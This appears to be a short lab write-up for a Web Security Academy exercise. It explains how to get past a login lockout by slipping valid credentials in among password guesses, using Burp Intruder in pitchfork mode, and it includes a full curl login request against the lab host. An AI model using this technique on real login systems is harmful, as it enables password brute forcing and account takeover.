

if send 3 req and username & password is incorrect you will ban
But if you send a true credential this protection will be reset and can brute force your password

so make list of username & password with python script then use that list with intruder & pickfork option

remember you can use macro option in burp

curl -i -s -k -X $'POST' \
    -H $'Host: 0a5f00f8039f9b7a82a6b52a00c200ec.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 33' -H $'Origin: https://0a5f00f8039f9b7a82a6b52a00c200ec.web-security-academy.net' -H $'Referer: https://0a5f00f8039f9b7a82a6b52a00c200ec.web-security-academy.net/login' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' -H $'Connection: keep-alive' \
    -b $'session=022k1FGFhI3zjmoJVWF3EzTAPLybDgHf' \
    --data-binary $'username=carlos&password=computer' \
    $'https://0a5f00f8039f9b7a82a6b52a00c200ec.web-security-academy.net/login'
	
then we can find true credential

and don't forget config resource pool to send 1 req